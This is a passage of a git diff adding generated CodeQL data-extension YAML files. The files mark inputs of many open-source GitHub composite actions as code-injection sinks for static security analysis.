+extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] + - ["pardeike/harmony", "*", "input.build_configuration", "code-injection", "generated"] + - ["pardeike/harmony", "*", "input.target_framework_array", "code-injection", "generated"] + - ["pardeike/harmony", "*", "input.target_framework", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/actions/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml new file mode 100644 index 000000000000..6f56ef896d3d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] + - ["pennylaneai/pennylane", "*", "input.additional_pip_packages", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/actions/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml new file mode 100644 index 000000000000..1520e1fa3b12 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.ext-path", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.pecl", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.arch", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.msvc", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.ts", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.php_version", "code-injection", "generated"] + - ["phalcon/cphalcon", "*", "input.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/actions/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml new file mode 100644 index 000000000000..2d0a5e4f6d6c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] + - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/actions/ql/lib/ext/generated/composite-actions/php_php-src.model.yml new file mode 100644 index 000000000000..c4224e600572 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] + - ["php/php-src", "*", "input.runTestsParameters", "code-injection", "generated"] + - ["php/php-src", "*", "input.token", "code-injection", "generated"] + - ["php/php-src", "*", "input.configurationParameters", "code-injection", "generated"] + - ["php/php-src", "*", "input.libmysql", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/actions/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml new file mode 100644 index 000000000000..b452fb2ebd53 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] + - ["phpdocumentor/phpdocumentor", "*", "input.secret-key", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/actions/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml new file mode 100644 index 000000000000..e75842caa3f2 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.protobuf_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.lz4_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.grpcio_version", "code-injection", "generated"] + - ["pinecone-io/pinecone-python-client", "*", "input.pinecone_client_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/actions/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml new file mode 100644 index 000000000000..53a35fdd9d92 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/actions/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml new file mode 100644 index 000000000000..ca216f3b0912 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] + - ["posthog/posthog", "*", "input.concurrency", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/actions/ql/lib/ext/generated/composite-actions/primer_react.model.yml new file mode 100644 index 000000000000..25107038af5f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["primer/react", "*", "input.token", "code-injection", "generated"] + - ["primer/react", "*", "input.schedule-id", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/actions/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml new file mode 100644 index 000000000000..04132df42bf5 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "input.action", "code-injection", "generated"] + - ["project-chip/connectedhomeip", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/actions/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml new file mode 100644 index 000000000000..ca7d52c45a96 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "input.java-version", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "input.job-instance", "code-injection", "generated"] + - ["projectnessie/nessie", "*", "input.job-id", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/actions/ql/lib/ext/generated/composite-actions/psf_black.model.yml new file mode 100644 index 000000000000..3e42add86504 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/actions/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml new file mode 100644 index 000000000000..c0b4d00d5e5a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/actions/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml new file mode 100644 index 000000000000..505790a2c9ad --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "input.cuda-version", "code-injection", "generated"] + - ["pyg-team/pytorch/geometric", "*", "input.torch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/actions/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml new file mode 100644 index 000000000000..ebb4ebff5e30 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/actions/ql/lib/ext/generated/composite-actions/python_mypy.model.yml new file mode 100644 index 000000000000..fcac2d1554da --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] + - ["python/mypy", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/actions/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml new file mode 100644 index 000000000000..a4fc1bd993de --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.keychain", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.certificate-file", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.certificate-value", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.working-dir", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.bucket", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.base-url", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.files", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.binary-name", "code-injection", "generated"] + - ["quarto-dev/quarto-cli", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/actions/ql/lib/ext/generated/composite-actions/quay_clair.model.yml new file mode 100644 index 000000000000..6831b4406bc7 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["quay/clair", "*", "input.tag", "code-injection", "generated"] + - ["quay/clair", "*", "input.repo", "code-injection", "generated"] + - ["quay/clair", "*", "input.quay", "code-injection", "generated"] + - ["quay/clair", "*", "input.duration", "code-injection", "generated"] + - ["quay/clair", "*", "input.token", "code-injection", "generated"] + - ["quay/clair", "*", "input.dir", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/actions/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml new file mode 100644 index 000000000000..c669f9be2f89 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] + - ["quickwit-oss/quickwit", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml new file mode 100644 index 000000000000..ef7bf632aee7 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.dependencies", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.upgrade", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.pak-version", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.profile", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.install-pandoc", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.extra-packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.packages", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.needs", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.error-on", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.build_args", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.args", "code-injection", "generated"] + - ["r-lib/actions", "*", "input.check-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/actions/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml new file mode 100644 index 000000000000..1aa3eedfe897 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["randombit/botan", "*", "input.target", "code-injection", "generated"] + - ["randombit/botan", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/actions/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml new file mode 100644 index 000000000000..aa9670d3de3c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.destination", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.source", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.bastion_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.primary_host", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.public_bastion_host_keys", "code-injection", "generated"] + - ["raspberrypi/documentation", "*", "input.private_ssh_key", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/actions/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml new file mode 100644 index 000000000000..79cc879fa67c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/actions/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml new file mode 100644 index 000000000000..f8964efbc562 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.platform", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.message-template", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.project-language", "code-injection", "generated"] + - ["readthedocs/actions", "*", "input.project-slug", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/actions/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml new file mode 100644 index 000000000000..102d0aa85e56 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/actions/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml new file mode 100644 index 000000000000..c1743b69eb21 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/actions/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml new file mode 100644 index 000000000000..47a1811b49f7 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "input.install_command", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "input.env_activate", "code-injection", "generated"] + - ["rethinkdb/rethinkdb", "*", "input.default_python_driver_commit_hash", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/actions/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml new file mode 100644 index 000000000000..9941f981d758 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] + - ["risc0/risc0", "*", "input.components", "code-injection", "generated"] + - ["risc0/risc0", "*", "input.targets", "code-injection", "generated"] + - ["risc0/risc0", "*", "input.toolchain", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/actions/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml new file mode 100644 index 000000000000..eac3e751bdea --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "input.release", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "input.docker-tag", "code-injection", "generated"] + - ["rocketchat/rocket.chat", "*", "input.root-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/actions/ql/lib/ext/generated/composite-actions/rook_rook.model.yml new file mode 100644 index 000000000000..3c613a4eb882 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] + - ["rook/rook", "*", "input.kubernetes-version", "code-injection", "generated"] + - ["rook/rook", "*", "input.additional-namespace", "code-injection", "generated"] + - ["rook/rook", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/actions/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml new file mode 100644 index 000000000000..b846058b3f06 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/actions/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml new file mode 100644 index 000000000000..7337d8896f37 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/actions/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml new file mode 100644 index 000000000000..3c6675a13c9e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.srcdir", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.test-opts", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.report-path", "code-injection", "generated"] + - ["ruby/ruby", "*", "input.launchable-token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/actions/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml new file mode 100644 index 000000000000..9f0f612d1a60 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_PASS", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_USER", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.sim_output", "code-injection", "generated"] + - ["rusefi/rusefi", "*", "input.RUSEFI_SSH_PASS", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/actions/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml new file mode 100644 index 000000000000..9e5715f26385 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.upload-chunk-size", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.restore-keys", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.save-always", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.lookup-only", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.fail-on-cache-miss", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.enableCrossOsArchive", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.key", "code-injection", "generated"] + - ["saltstack/salt", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/actions/ql/lib/ext/generated/composite-actions/saltstack_salt.yml new file mode 100644 index 000000000000..02fe0539869e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/actions/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml new file mode 100644 index 000000000000..86be8acfeea0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/actions/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml new file mode 100644 index 000000000000..fff292f42bbd --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] + - ["scala-native/scala-native", "*", "input.scala-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/actions/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml new file mode 100644 index 000000000000..141c52a8ccd3 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["scitools/iris", "*", "input.version", "code-injection", "generated"] + - ["scitools/iris", "*", "input.install_packages", "code-injection", "generated"] + - ["scitools/iris", "*", "input.env_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/actions/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml new file mode 100644 index 000000000000..a073f87d9454 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubToken", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubRef", "code-injection", "generated"] + - ["scylladb/scylla-operator", "*", "input.githubRepository", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/actions/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml new file mode 100644 index 000000000000..5e10745332bd --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.os", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.runs-on", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.config", "code-injection", "generated"] + - ["shader-slang/slang", "*", "input.compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/actions/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml new file mode 100644 index 000000000000..e278f0849bff --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.context", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.job_name", "code-injection", "generated"] + - ["shaka-project/shaka-player", "*", "input.token", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/actions/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml new file mode 100644 index 000000000000..45598fe4bc78 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] + - ["shakacode/react-webpack-rails-tutorial", "*", "input.app_name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml 